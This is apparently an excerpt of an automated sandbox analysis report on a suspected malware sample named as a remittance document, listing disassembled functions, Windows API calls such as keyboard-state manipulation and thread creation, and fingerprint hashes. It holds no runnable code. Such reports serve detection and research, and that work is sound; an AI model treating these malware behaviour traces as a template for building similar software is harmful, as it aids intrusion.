                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastselect
                                                                      • String ID:
                                                                      • API String ID: 215497628-0
                                                                      • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                      • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 0044443B
                                                                      • GetKeyboardState.USER32(?), ref: 00444450
                                                                      • SetKeyboardState.USER32(?), ref: 004444A4
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00444633
                                                                      • GetKeyboardState.USER32(?), ref: 00444648
                                                                      • SetKeyboardState.USER32(?), ref: 0044469C
                                                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __snwprintf__wcsicoll_wcscpy
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                      • API String ID: 1729044348-3025626884
                                                                      • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                      • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                                      • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                      • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                      • String ID:
                                                                      • API String ID: 2354583917-0
                                                                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                      APIs
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Enable$Show$MessageMoveSend
                                                                      • String ID:
                                                                      • API String ID: 896007046-0
                                                                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                      • GetFocus.USER32 ref: 00448ACF
                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Enable$Show$FocusMessageSend
                                                                      • String ID:
                                                                      • API String ID: 3429747543-0
                                                                      • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                      • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                      • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                      • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                      • __swprintf.LIBCMT ref: 0045D4E9
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                      • String ID: %lu$\VH
                                                                      • API String ID: 3164766367-2432546070
                                                                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 3850602802-3636473452
                                                                      • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                      • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                      • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                      • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 0041F707
                                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                      • _free.LIBCMT ref: 0041F71A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free_malloc
                                                                      • String ID: [B
                                                                      • API String ID: 1020059152-632041663
                                                                      • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                      • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                      APIs
                                                                      • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                      • __calloc_crt.LIBCMT ref: 00413DB0
                                                                      • __getptd.LIBCMT ref: 00413DBD
                                                                      • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                      • _free.LIBCMT ref: 00413E07
                                                                      • __dosmaperr.LIBCMT ref: 00413E12
                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                      • String ID:
                                                                      • API String ID: 155776804-0
                                                                      • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                      • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                      • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                      • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                      APIs
                                                                        • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                        • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                      • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                      • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                      • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                      APIs
                                                                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                      • ExitThread.KERNEL32 ref: 00413D4E
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                      • __freefls@4.LIBCMT ref: 00413D74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                      • String ID:
                                                                      • API String ID: 259663610-0
                                                                      • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                      • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
